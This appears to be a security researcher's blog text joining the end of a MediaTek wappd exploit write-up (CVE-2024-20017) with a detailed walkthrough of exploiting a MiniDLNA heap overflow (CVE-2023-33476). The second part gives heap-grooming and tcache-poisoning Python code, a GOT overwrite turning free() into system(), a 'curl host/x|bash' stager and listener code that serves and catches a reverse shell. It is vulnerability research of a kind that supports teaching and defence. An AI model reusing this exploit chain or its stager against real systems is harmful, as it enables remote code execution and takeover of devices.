I’ll save you the time (and frustration) of going over every possible avenue I went down looking for this next piece and just tell you now: there was nothing. While there were multiple global structures filled with function pointers, none of them are used within the request processing loop. The data portions of some other data structures with viable targets also are unused. Full RELRO means corrupting GOT/PLT entries is also out. And this brings us the main point here: sometimes even arbitrary write primitives will not be enough to gain code execution. I’m of the mind that it’s always a good idea to follow every thread and try every possible angle during exploit dev, but the reality is that sometimes, there just isn’t any. Valid vulnerabilities that are exploitable in one environment will not always be exploitable in another; everything matters. Which is why I also follow the motto “exploit or GTFO” – unless impact has been shown against the real target with a real exploit, little can be said about the real-world impact of a vulnerability.

accepting defeat: the exploit will only work on termination

As mentioned in the important changes section, there was one return address that could be corrupted: the one for IAPP_RcvHandler(). The issue was that this function only returns on process termination when a SIGTERM is caught and handled. I’d initially ignored this since there’s no way to force this termination as a remote attacker but, having hit a dead-end on finding another execution primitive, I had to accept defeat and just decided to write the exploit with the assumption that the process would terminate and hit the corrupted return address. The end of this post would be pretty anticlimactic if I just stopped here, right?

final exploit overview

Having gone over all of the important bits of the process that eventually led to the final exploit, we’ll now switch back to the present and talk about how the exploit works. Given that this post is already pretty long, I’ll avoid going over every detail of how the final exploit came together and instead focus on the parts that I think are most interesting or important (feel free to reach out on twitter if you have any follow up questions). This one reuses a few of the concepts that were covered in previous exploits, including using pointer corruption to get a write primitive, using the .bss/.data segment as a buffer for the main payload, and leveraging ROP (technical JOP, in this case) to set up the arguments for calling system() to get command execution.

To summarize where we’re starting from:

• We have an arbitrary write primitive of up to 1600 bytes via corruption of the pPktBuf pointer
• We have a way to redirect code execution via corruption of the saved return address in the stack frame for IAPP_RcvHandler() (but this will only be triggered when the process receives a SIGTERM signal)

The exploit is split up into two requests: one that corrupts the pPktBuf pointer to set up the write primitive and another that uses the write primitive to write the shell payload and some other data into a known memory region for later use.

The first one is pretty straightforward as all that really needs to be done is send a payload large enough to overflow up to the pPktBuf pointer and make it point to the start of the .bss segment in memory. As this pointer is used to store incoming request data, the contents of the next request we send will be written to that address. Apart from corrupting this pointer, the first payload also corrupts the pCmdBuf pointer, which is used to store data parsed out of the packet we send. As such, pCmdBuf needs to point to a writeable segment of memory to avoid crashing or prematurely aborting, so we overwrite it to also point to an offset into the .bss, but far enough to ensure it won’t affect the payload sent in the second request.

The second request is where the real action happens. Having set up the write primitive with the first request, this new payload needs to accomplish the following:

1. Write our shell command to a location we can reference when we call system()
2. Corrupt the saved return address to redirect code execution to a ROP gadget used to set up the argument to system()
   • ROP/JOP gadget does:
     • moves values in x24 to x0 (x0 is used to pass first arg to the called function)
     • jumps to the value in x22
3. Provide the address to system() and the address of the shell command from step 1 so they can be used by the ROP gadget. These values will be loaded in registers when the corrupted return address is used and exec jumps to the ROP gadget.
   • address where shell command string was written -> loaded into x0
   • address of system().plt -> loaded into x22
4. Corrupt the pPktBuf, pCmdBuf, and pRspBuf pointers to set them to NULL to avoid triggering libc malloc sanity checks when these pointers are free’d in IAPP_RcvHandler() during termination
5. Redirect execution to system() after having set up the argument (i.e. the address to the shell command written in step 1)

The first two steps are pretty simple. We write the shell command we want executed right at the start of the payload; since we’ve corrupted pPktBuf to point to a known location and that’s where this second payload will be written, we can predict where this string will be located. In this case, as pPktBuf has been set to the start of the .bss segment, the command string will be located 16 bytes into the .bss segment (to account for the packet header and other fields of the SB packet struct). For step two, we know the offset into the overflow where the saved return address for IAPP_RcvHandler() is located, so we simply overwrite that location with the address of the ROP gadget we’ll use to set up arguments and redirect execution to system().

Let’s take a moment to talk about that ROP gadget and ROP in general on arm64 vs. x86. As mentioned before, the return semantics are different in arm64 vs x86, which means the gadgets work a little differently. In particular, ROP gadgets in arm64 don’t just need to end in a ret in order to be useful; they have to end with the correct stack operation to pop the next value on the stack into x30 before executing the ret. This combined with the fact that arm64 has many more general purpose registers vs. x86 means that the likelihood of finding gadgets that make use of registers you can control and that also properly set up for the ret is much lower vs. x86, where there are only a handful of registers that are used and whatever is next on the stack is used automatically on ret.

Anyway, the gadget used in the final exploit is technically a JOP (Jump Oriented Programming) gadget so we avoid the issue with ret entirely. Rather than using ret to redirect execution, JOP gadgets jump directly to a value stored in a register. We get lucky in that we’re able to control a handful of registers at the time when execution is redirected to the gadget. Two of those registers are x22 and x24, so we’re able to use the following gadget, which simply moves the value in x24 to x0 (the register used to pass the first arg to a function) and then jumps to the address in x22:

mov x0, x24;   # we'll put the addr of the shell command string in x24
blr x22;       # and the address of `system()` in x22

Going back to the remainder of the exploit, the only other thing that needs to be done is corrupt the pPktBuf, pCmdBuf, and pRspBuf pointers to set them each to NULL. We do this because at the end of IAPP_RcvHandler(), prior to returning and using our corrupted return address, these pointers will be passed to free() if they’re not NULL. If they’re still pointing to the previous locations we set them to, we’ll end up triggering libc malloc’s sanity checks and trigger an abort() before we’re able to redirect execution.

With all of that in place, we arrive at the Promised Land:

bonus: triggering a kernel bug by performing arbitrary IOCTL calls via JOP

As a final bonus, what if you could write one exploit for two completely separate vulns? Like if there happened to be a bug in a kernel driver that could only be reached locally and a separate bug in a network service that could be exploited remotely…? Well, you might have to do some wacky stuff like use a JOP chain to open a new socket, construct an iwreq struct in memory to pass to the kernel, set up arguments, and trigger a call to ioctl(). But if you can find a way…

Why do this rather than just use the command exec to download the kernel exploit and run it? Just to show you can ;)

wrapping up

This post ended up being much longer than I had initially intended it to be! I hope I provided enough info along the way without making it boring or (too) confusing. I also hope it’s helpful to anyone looking to learn more about exploit development and that it can provide some insight into the different approaches that can be taken in different circumstances. Exploiting a stack buffer overflow is fundamentally the same across all codebases – it’s everything else around the overflow that makes it interesting and challenging. It’s like working on an intricate puzzle where there’s no guarantee all of the pieces will fit together but there’s also more than one way to solve it. This is what makes exploit development fun for me and why I’d go through the trouble of writing 4 different exploits for the same bug. This shit breaks your brain a little lol.

references

• Exploit code
• NVD - CVE-2024-20017
• MediaTek March 2024 Advisory
• Fuzzotron
• OpenWrt MT7622 images page

Introduction

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a shell. Check out part 1 for the root cause analysis of this bug.

Before diving into the details of the vulnerability and the exploit, its worth taking a moment to go over the basics of how chunked requests work and fundamentals of the bug.

Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve tried to include as much as possible to help it all make sense and help others who are trying to learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any corrections needed.

If you just care about the code, you can find it here.

review of http chunked encoding

An HTTP request will set the Transfer-Encoding HTTP header to chunked to indicate to the server that the body of the request should be processed in chunks. The chunks follow a common encoding scheme: a header containing the size of the chunk (in hex) followed by the actual chunk data. As this is HTTP, the character sequence \r\n serves as delimiter bytes between chunk size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.

A typical request using chunked encoding will look something like this:

POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

The request above contains two chunks: one 4-byte chunk and one 16 byte chunk (chunk sizes are parsed as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and use this to construct a single blob of data composed of the concatenated chunk data, minus the size metadata.

summary of the bug and initial primitive

Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code that triggers the memory corruption as a result of the bug is shown below.

    char *chunkstart, *chunk, *endptr, *endbuf;

    // `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunk size parsed by strol() above
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }

To recap the important details:

• strtol() is used to parse the HTTP chunk size from the body of the request (which we fully control). The value returned by strtol() is saved to h->req_chunklen
• h->req_chunklen is used as the size argument in a call to memmove() without bounds-checking
• The dest and src arguments passed to memmove() are both offsets into the request buffer; in theory, they should point to the first digit of the chunk size and the first byte of the actual chunk data that follows the chunk size, respectively.
• the request buffer containing our data is allocated on the heap

Due to the missing bounds-check in the code above (and the broken validation logic that is the root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this point, I still had almost no control over what gets written and where its written to. Since the corruption occurs on data allocated on the heap, this introduced the option to either attack the application data directly or target the heap metadata to derive more powerful primitives.

Understanding the Corruption Mechanism

NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.

effects of memmove()

We’ll start with the detail that had the most impact on developing the exploit: the use of memmove() to concatenate the end of one HTTP chunk to the next. Each iteration through the while loop in the code snippet above is meant to process a single HTTP chunk from the body of the request; assuming multiple chunks are present (which is always the case for valid requests) the code needs to concatenate the beginning of the chunk it is processing to the tail end of the chunks that have already been processed and remove the chunk size metadata between them. The application does this in-line within the same buffer instead of creating a new allocation to hold the final blob of data; it selects the range of bytes pertaining to the current chunk being processed based on the chunk size it finds in the request and will then ‘left-shift’ those bytes x bytes lower in memory, where x is the total length of the chunk size field (i.e. strlen(chunk_size_line)).

In practical terms, this introduces the following conditions and constraints:

• As we can only control the size and not the location of the r/w, we are only be able to r/w higher into memory relative to location of the chunk in the buffer allocated for the request
• The number of bytes the data will be left-shifted by is determined by the distance between the dest and src args passed to memmove() (endbuf and endptr respectively in the snippet of the vulnerable code above)

visualizing the operation

This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at least not to me) so it may be useful to try to visualize it. I created the graphic below using Google Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.

The before and after rows below represent a contiguous chunk of memory containing the contents of an HTTP request before and after the memmove() operation using the chunk size at the beginning of the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling” on the left side of the ribbon starting at read_src , we can shift the bytes to the left toward us (we’re fixed at write_dest). There isn’t a limit to how much data to the right of read_src we can shift left, but we can only shift by (read_src - write_dest) slots. The grid slots (i.e. addresses) are fixed, so if we want some payload to end up at a specific target address we need to be able to shift the bytes of that payload left by at least (target_addr - payload_addr).

To break it down:

• The cells with the red border show the bytes that would be selected by a chunk size of 23 (as seen at the beginning of the row)
• The location where memmove() will write the bytes to is highlighted in green (endbuf ptr passed as first arg)
• The location where memmove() will start reading from is highlighted in purple (endptr ptr passed as the second arg)

Extrapolating from the examples above, we can see that changing the chunk size alone will have virtually 0 impact on where the data is written relative to our target — larger sizes will reach further into memory but will result in those bytes being shifted by the same distance, which means for a given target at address x and payload data at x+20, selecting bytes up to x+20 or x+100 will result in the same bytes being written to x after the call to memmove().

controlling the shift distance

As mentioned in the previous section, the distance the selected byte-range is shifted by is determined by the number of bytes between the pointer where the bytes will be written (endbuf) and the pointer where data will be read from (endptr). Based on the parsing logic, this ends up being the number of bytes between the first byte of the chunk size in the request body and the location where the first byte of actual chunk data is expected to be. In the code, this is done by passing a pointer &endptr as the second arg to strtol() when parsing the chunk size value from the request to have strtol() store the location of the first non-parsable value it encounters to this pointer. In a normal request, this would be the \r that comes immediately after the chunk size. The code checks for the presence of \r\n starting at the value saved to this pointer to confirm this sequence is in fact present and if found increments it by 2 to move it past those characters. The pointer would then presumably point to the start of the actual chunk data.

The relevant code is shown again here:

  while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
  {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        { ... }
        endptr += 2;

        memmove(endbuf, endptr, h->req_chunklen);
...

This means that in order to gain control over that distance, its necessary to introduce additional bytes between the two pointers without causing strtol() to stop parsing prematurely. Taking a look at the manpage for strtol(), the following line caught my attention:

The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]

By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary number of bytes in order to affect the distance between endbuf and endptr when memmove() is called. Alternatively, prepending 0's to the chunk size achieves the same result.

example

This example shows a request where no leading whitespace has been added. At the first round of processing:

• endbuf is at index/address 489
• endptr is at index/address 493
• Chunk size is 23, so 23 bytes will be shifted
• (489 - 493 = -4), so each byte in the range of bytes to be shifted will shift -4 bytes down.
• We want to overwrite 4 bytes starting at index 501 (cells highlighted in red)
• The payload data we want to use for the overwrite starts at index 512 (cells highlighted in yellow)
• Distance between overwrite target and overwrite data source is -11 bytes
• The corruption does NOT successfully shift our overwrite data to the desired location

With the introduction of whitespaces prepended to the chunk size at the start of the request body:

• endbuf is now at index 482
• endptr is still at index 493
• (482 - 493 = -11), so each byte in the range of bytes to be shifted will shift -11 bytes down.
• We want to overwrite 4 bytes starting at index 501
• The data we want to use for the overwrite starts at index 512
• Distance between overwrite target and overwrite data source is still -11 bytes

Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk size to make endbuf - endptr == overwrite_target - payload_data

heap-based corruption

The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of neighboring heap chunks. Based on the conditions described so far, it’s actually impossible to avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal request containing no data in the chunk fields (such as the request provided as an example at the beginning of this post) the memmove() operation is going to be performed on data near the end of the allocated buffer, overflowing into the next chunk almost immediately. While this introduces additional attack surface and exploitation options, it also adds some limitations, namely the need to bypass Glibc security and sanity checks so as to avoid abort()ing before the exploit finishes or triggering some other crash.

Heap Feng Shui

NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.

Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving some level of control over the layout of the heap in order to get target objects and payload data allocated at predictable locations. Based on conditions described above, this would be absolutely necessary for a successful exploit in this case. Specifically, it would be necessary in order to meet these requirements:

1. The target address for the overwrite target must be located higher in memory relative to where the request buffer used to trigger the corruption is located
2. The payload data used to overwrite the target address must be located higher in memory relative to the target address

Based on these requirements, the ideal memory layout would look something like this:

0x2000
---
	.....................
	...request_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

For this theoretical layout, we would then provide a chunk size large enough to traverse the overwrite_target and reach the last byte of the payload_data.

In practice, to achieve the layout above its necessary to:

• Have controlled data allocated to the heap
• Prevent the allocations from being free()’ed prematurely
• Force allocations to happen sequentially or in a way that can be reliably predicted

controlling allocations

Unsurprisingly, the most straightforward way to force the application to make heap allocations with controlled data is by sending HTTP requests, so this can be used as an interface/proxy for malloc(). One important detail about this is that the request buffer allocations are done using realloc() rather than malloc() — requests that exceed 2048 bytes will result in the existing allocation being reallocated, which can affect the heap layout and result in heap chunks being freed unintentionally. We can avoid this issue entirely by keeping all requests below this size.

holding request allocations

The next requirement is almost more important than the first — the allocations containing our controlled data must remain allocated across multiple requests in order to successfully get the desired memory layout. This took a little bit of fiddling around but I eventually found an easy way to do this.

The code that handles the initial reading of the request data from the socket is shown below. After copying the data from the static buffer to the dynamically allocated buffer at h->req_buf, it searches for the presence of the sequence \r\n\r\n using strstr() to determine whether the entire contents of the HTTP headers have been received (the first occurrence of that sequence is expected to be the terminator for the headers).

        memcpy(h->req_buf + h->req_buflen, buf, n);
        // update req_buflen
        h->req_buflen += n;
        h->req_buf[h->req_buflen] = '\0';

        /* search for the string "\r\n\r\n" */
        // this is the mechanism used to determine where the end of the http
        // headers are since that should be the first occurance of this string sequence
        // for a normal http request.
        endheaders = strstr(h->req_buf, "\r\n\r\n");

        if(endheaders)
        {
          h->req_contentoff = endheaders - h->req_buf + 4;
          h->req_contentlen = h->req_buflen - h->req_contentoff;
          ProcessHttpQuery_upnphttp(h);
        }

If this sequence is not found, the application will move on without entering the block where ProcessHttpQuery_upnphttp() is called above and wait for the client to send more data to complete the headers. This leaves the buffer at h->req_buf containing up to the first 2048 bytes of data sent allocated indefinitely until more data arrives on the socket or the connection is dropped by the client. By introducing a NULL byte anywhere before the first \r\n\r\n terminator in the request data sent it’s possible to force strstr() to terminate early and not find those characters. Alternatively, not including the terminator sequence at all will also result in the application assuming the client has not yet sent all headers and holding the the allocation. We can then free() any allocation made this way by closing the socket used to initiate it.

getting sequential allocations

With the two previous steps figured out, it was then possible to start influencing the heap layout with sufficient control to start working on getting the allocations made in a predictable way in order to eventually set things up in an ideal way for the exploit. The first step was to identify where heap allocations happen along the execution path for request processing, their sizes, and whether they contained any data that may be interesting to target. After a bit of code review we can determined that, apart from the request buffer allocation (saved to h->req_buf), the only other relevant allocation that happens for each request is for a upnphttp structure, which stores the state, data, and metadata for the request being processed (saved to h). The pointer to the request buffer itself is stored inside the upnphttp structure.

I created the following GDB script to log every time either a request allocation or upnphttp struct allocation occurred and the addresses for the allocations.

set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h->req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d

I wrote a Python script using raw sockets to start performing allocations for both the upnphttp structures and the request buffers and observing the addresses where the allocations occurred, using the method described in the previous section to keep the allocations held in memory across multiple requests. This took a bit of fiddling and playing with the order that connections were initiated in and when request buffers were allocated but I eventually found that after about 6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers began getting allocated sequentially in memory.

separating the connection and request buffer allocations

Because the fields of the upnphttp structure are accessed throughout the code that handles request processing, it would be ideal to separate those allocations from the request buffer allocations so that the latter end up allocated sequentially, rather than having the upnphttp structures sandwiched between them. This can be accomplished by initiating the connections that will be needed before sending any data on the sockets — the upnphttp structures are allocated when the connection is received (in New_upnphttp(), called by ProcessListen() upon receiving a new connection) and will remain allocated as long as the connection is kept open, which allows us to send data asynchronously from when the connections are initiated.

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

Taking another look at the ideal heap layout described above, here is what needs to be done to construct it using the techniques and information described so far:

• Allocate the connection upnphttp structs that will be needed before sending any request data
• Send request data on x of the allocated connections to reach the point where request buffer allocations start happening sequentially. The real ‘crafted heap’ starts here.
• Send the request data for the request that will trigger the corruption (’top’ of the crafted heap, at lower address)
• Send request data to create another request buffer allocation of the same size as the previous one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.
• Send the request containing the payload data that will be written to the target (’bottom’ of the crafter heap, at higher address)

0x2000
---
	.....................
	...corrupt_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

As can be seen, the request that is used to trigger the corruption must be sent before allocating the other buffers to have it allocated at a lower address relative to the others. This is a bit of an issue because sending the actual corruption payload first would either trigger a crash prematurely at worst (preventing anything else from being done) or get processed and result in the buffer being free()‘d at best. After spending some time learning about the Glibc malloc implementation and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation in the place where the corruption buffer would need to be; that allocation then gets free()‘d immediately before sending the actual corruption request, after the crafted heap has been set up. By making this placeholder allocation the same size as the corruption request allocation (rounded up to the actual malloc chunk size), making an allocation of that size immediately after it’s free()‘d results in the same chunk being returned by malloc() due to its “first fit” design. This means that sending the actual corruption request after dropping the connection for the placeholder buffer (causing it to be free()‘d) will result in the data for the corruption payload being allocated where we need it.

putting it all together

Having figured out everything covered in the previous sections, we now have everything we need to write an exploit. Before going into the meaty details, lets take a moment to review. We can now:

• Control when allocations (i.e. malloc calls) are made and control their size
• Control when allocations are free()‘d so we can keep buffers in place while we make other allocations
• Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory
• Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

Whew! That was a lot of background to cover but hopefully that will all help with making sense of the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll avoid going into specifics like sizes and addresses since those are variable and not critical for understanding how the exploit works. The source code for the exploits has been heavily commented if you’re interested in more details.

The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the Global Offset Table (GOT) and overwrite the entries for free() and fprintf() to point to system(). free() is targeted as it will be called for h->req_buf at the end of request handling, transforming the call from free(h->req_buf) to system(h->req_buf). The payload sent for the final allocation where the GOT is corrupted begins with a shell command that will download and execute a script from an attacker-controlled server and spawn a reverse shell.

setup: building the target

The exploit is written for a binary with only partial RELRO and no PIE; the address of system() in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM using Glibc 2.31 (default version installed by OS).

# install deps
sudo apt install -y autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev \
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
cd minidlna-git && git checkout tags/v1_3_2
./autogen.sh
./configure --enable-tivo CC=clang CFLAGS="-g -O0 -fstack-protector"
make minidlnad CC=clang CFLAGS="-g -O0 -fstack-protector"

This is the output of the checksec tool for the output binary:

-> % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The server can be started using the following command:

sudo ./minidlnad -R -f minidlna.conf -d

tcache poisoning tl;dr

I’ll assume you have some background on heap exploit techniques so won’t go super in-depth here but if not I highly recommend the how2heap series on Github. It covers basically every known technique and has up-to-date examples for the latest Glibc versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional constraints and checks that will need to be bypassed.

At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free chunks in both directions, it only keeps a singly-linked list using the fd fields of the free()‘d chunks to keep track of them. By corrupting the fd pointer of a free’d chunk in a tcache bin for a given size, a subsequent call to malloc() for that size will result in the allocator returning the chunk pointed to by fd.

constructing the fake chunk for poisoning

Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s already been free’d and this chunk needs to be located after the request buffer containing the payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so we control its contents and can place the payload data we want written to the target location (the fd pointer) within it. One important thing to note is that because we free the chunk before corrupting it, the first 16 bytes of the data we send will be overwritten by free() to store the fd and bk pointers (though technically only the fd pointer is actually used by tcache), so the payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before we copy it over the target location.

The illustration below shows how this chunk would look before and after being free’d, with return_addr at the right offset to ensure its left intact.

heap preparation

The first step taken is to use the techniques described earlier in the post to set the heap up so that we can get allocations created sequentially and spray the fake chunks described in the previous section into those allocations to use them later.

    # * the socks at the end of this list should all be right next to each other
    # * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
    #   will come from that sequential chunks. we need at least 2-3 sequential chunks so we use
    #   a total of 10 allocations here

    # create and connect needed sockets before sending any data on any of them. This should
    # keep the allocations for the upnphttp structs separate from the request buffer allocations.
    GROOMING_ALLOCS = 10
    xpr(f"starting heap grooming round, using {GROOMING_ALLOCS} allocs...")
    dummies = create_sockets(GROOMING_ALLOCS)
    connect_sockets(dummies, server_ip, server_port)

    # This is the target address we want malloc to return after the chunk has been corrupted
    where = pwn.pack(target_addr, 64)

    # create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
    # (fd, bk)
    pre_pad = b"\x11" * 16 # \x11 is arbitrary
    core = pre_pad + where

    # pad the end of the paylaod with enough bytes to meet the size needed for the target tcache bin
    # allocations need to be kept the same size because tcache bins must match exact sizes
    payload = pad(ALLOC_SIZE, core)

    # send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
    # the last 3-4 will be allocated sequentially.
    sendsocks(dummies, payload)

    # free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
    # so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
    # both the upnphttp structs and the request buffers they contain.
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()

After this code runs and the last few allocations are dropped, those free’d chunks should look something like this in memory and should be in the tcache bin for the matching size (0x60):

poisoning the free’d chunk

Immediately after setting up the heap, the exploit then initiates a connection for the request that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to trigger the corruption is padded to match the size of the chunks we just free’d in the previous step so when the allocation is made, malloc() will return the last chunk that was inserted into the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted into the corresponding tcache bin will be the top chunk shown in the illustration above (at the lower addresses), so that’s the chunk we’ll get back.

Assuming everything is set up correctly, the chunk for the corruption request and the target chunk will then look like this (the buffer containing the corruption payload highlighted in green). As can be seen, things are now set up in such a way that we should be able to use the OOB read to read past the end of the buffer containing the corruption payload and into the free’d chunk immediately after it. The free’d chunks still contain the return address payload we want to have written over the fd pointer of the same chunk, so we should be able to reach return_addr with the call to memmove() since we have full control over the len argument.

The write portion of the memmove() will then “slide” the selected region of bytes “up” (based on the illustration above) so that return_addr ends up overwriting fd 40 bytes below it. To accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the desired location as described in the “controlling the shift distance” section earlier in the post. Once this request has been processed, it will get free’d and inserted back into the same tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this (note that the size, prev_size, etc values shown at the end of the corruption buf are from the chunk below it, showing where those values end up after the call to memmove()):

In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need to make at least 1 allocation of that same size before that and then the next allocation of that size will have malloc() return the pointer we wrote to fd back to us. In the case of the exploit, this will be the address of the Global Offset Table (GOT).

corrupting the GOT

After successfully tricking malloc() into returning a pointer to the GOT, the next step is to corrupt one (or more) of the entries contained within to achieve code execution. The most straightforward way to do this is to call system() and pass it a pointer to some data we control containing a string with the command we want to execute. Since we have full control over the content that’s written, the question is then to figure out which function(s) to corrupt. Because system() expects a single argument that’s a pointer to some string data, the function(s) we target must also take a char (or void) pointer for its first argument and that pointer has to point to data we control. Finally, the target function(s) need to be called at some point after we’ve corrupted the GOT but before any other GOT entries that we’ve corrupted are referenced, since this will almost certainly result in a crash.

Taking all of this into consideration, I eventually found the two functions that would be targeted: fprintf() and free(). The actual entry that produces the code execution is free() but because the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial writes into the request buffer, successfully corrupting free() also results in corrupting other GOT entries, including the one for fprintf(), so it needs to point to a valid function since it’s called at least once before the next call to free(). Corrupting free() is a logical option since it meets all of the requirements without any additional setup: it takes a single pointer argument and will be called and passed the pointer to our request buffer almost immediately after we corrupt the GOT, reducing the risk of other functions that have been corrupted being called and crashing the application prematurely. As a bonus, hijacking free() also helps us avoid triggering the sanity checks in Glibc that would trigger an abort() after we’ve corrupted the heap metadata.

Because free() (i.e. system() after the GOT is corrupted) will be called on the pointer to the GOT where we’re writing the fake entries to, we can insert the command string we want passed to system() right at the start of the buffer to have it executed. The code below shows the construction of the final payload containing the command to run and the fake GOT entries with the padding needed for the binary the exploit was written for (free() at GOT+0x40, fprintf() at GOT+0x50):

    # set up the command string that will be passed to system()
    staging_server_addr = f"{args.lhost}:{args.lport}"
    # command: e.g. `curl 192.168.1.8:8080/x|bash`
    command_str = f"curl {staging_server_addr}/x|bash".encode()
    command_padding = b""

    # final cmd string max len is 64, if less than, pad it out
    OFFSET_TO_FREE = 64
    if len(command_str) < OFFSET_TO_FREE:
        command_padding = b"\x00" * (OFFSET_TO_FREE - len(command_str))
    if len(command_str) > OFFSET_TO_FREE:
        xpr("command string too long using provided args, offsets will fail. bailing...")
        sys.exit(1)
    command = command_str + command_padding

    # set up fake GOT table for the overwrite (note: this will need to updated for binaries that have different offsets between the two)
    got_table = b""
    got_table += pwn.p64(args.system_addr) # free() entry
    got_table += pwn.p64(0x0) # pad
    got_table += pwn.p64(args.system_addr) # fprintf() entry

    final_payload = command + got_table

After the final payload above has been sent and the GOT has been corrupted, the next call to free() will actually be a call to system() and it will be passed the pointer where we just wrote the payload.

reverse shell stager and listener

The command string passed to system() will download a script from an attacker-controlled server using curl and pipe the contents of the script to bash. The exploit sets up an HTTP listener to handle the incoming request and responds with a small script to initiate a reverse shell back to the attacker-controlled server. After responding to that request, it creates the listener for the reverse shell and waits for the connection.

    # handle the http request to serve script to spawn reverse shell
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        l.sendline(resp.encode() + reverse_shell_cmd.encode())
        l.close()
    else:
        xerr("=ERROR=: Timed out waiting for staging connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target")
        sys.exit(1)

    # wait for the incoming reverse shell connection; bail if we don't get it in a second.
    l = pwn.listen(args.lport)
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        xpr("~~~ <CHONKCHONKCHONK> ~~~")
        l.interactive()
    else:
        xerr("=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target")
        sys.exit(1)

popping a shell

And here’s the exploit running against the target binary:

Wrapping Up

